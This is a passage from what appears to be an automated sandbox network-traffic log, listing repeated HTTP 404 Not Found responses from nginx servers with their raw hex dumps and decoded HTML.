20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:49 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:50 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:53 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:54 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:59 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:28:59 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Tue, 08 Oct 2024 13:29:13 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.2Date: Tue, 08 Oct 2024 13:29:21 GMTTransfer-Encoding: chunkedConnection: keep-aliveKeep-Alive: timeout=20Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
              Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Tue, 08 Oct 2024 13:29:34 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
